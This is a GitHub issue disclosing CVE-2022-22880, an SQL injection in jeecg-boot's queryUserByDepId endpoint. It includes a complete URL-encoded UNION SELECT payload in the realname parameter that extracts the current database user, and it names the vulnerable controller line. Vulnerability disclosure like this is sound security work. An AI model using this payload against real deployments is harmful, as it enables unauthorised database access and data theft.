Headline
CVE-2022-22880: SQL injection exists in /jeecg-boot/sys/user/queryUserByDepId · Issue #3347 · jeecgboot/jeecg-boot
Jeecg-boot v3.0 was discovered to contain a SQL injection vulnerability via the code parameter in /jeecg-boot/sys/user/queryUserByDepId.
版本号:
<=3.0
问题描述:
After testing, it is found that the code parameter of /jeecg-boot/sys/user/queryUserByDepId interface of jeecg-boot has SQL injection
截图&代码:
payload:/jeecg-boot/sys/user/queryUserByDepId?_t=1641263644&id=57197590443c44f083d42ae24ef26a2c&realname=%64%61%73%64%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%63%6f%6e%63%61%74%28%30%78%37%2c%69%66%6e%75%6c%6c%28%63%61%73%74%28%63%75%72%72%65%6e%74%5f%75%73%65%72%28%29%20%61%73%20%6e%63%68%61%72%29%2c%30%78%32%30%29%2c%30%78%37%29%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2c%4e%55%4c%4c%2d%2d%20%2d
The vulnerability code exists in the following code:\jeecg-boot\jeecg-boot-module-system\src\main\java\org\jeecg\modules\system\controller\SysUserController.java At line 366 of
友情提示(为了提高issue处理效率):
- 未按格式要求发帖,会被直接删掉;
- 请自己初判问题描述是否清楚,是否方便我们调查处理;
- 针对问题请说明是Online在线功能(需说明用的主题模板),还是生成的代码功能;
- 描述过于简单或模糊,导致无法处理的,会被直接删掉;